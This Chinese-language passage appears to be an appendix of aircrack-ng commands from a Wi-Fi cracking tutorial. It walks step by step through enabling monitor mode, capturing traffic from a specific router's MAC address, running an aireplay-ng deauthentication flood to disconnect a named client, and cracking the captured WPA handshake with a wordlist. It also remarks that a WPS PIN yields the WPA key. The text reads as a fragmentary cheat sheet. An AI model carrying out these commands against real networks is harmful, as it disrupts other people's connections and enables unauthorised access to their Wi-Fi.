拿 pin 码就可以直接跑出 WPA PSK
附录
aircrack-ng - 命令清单
airmon-ng start [网卡] # 开启monitor模式 |
ifconfig -a 查看网卡 |
监听网络,完了 Ctrl + C 退出
主要参数说明:
# BSSID :路由器、AP的MAC地址 |
目标有了,开始对其进行 cap 包的监听和获取,这里要让其中连接的设备重连才能抓包其握手包,可以慢慢等待,也可以使用 deauth 洪水攻击。
airodump-ng -c 9 --bssid 78:11:DC:10:4F:66 -w /root/handshake/ wlan0mon |
另起窗口,我们用 deauth 洪水攻击,让其中的一台设备掉线,它掉线后会自动连接(除非别人在 wifi 设置中勾选掉了自动连接)
aireplay-ng -0 20 -a 78:11:DC:10:4F:66 -c 6C:88:14:F2:47:8C wlan0mon |
上字典(关键东西),让它慢慢破去吧
root@huan:~#aircrack-ng -w /root/wordlist.txt /root/handshake/-02.cap |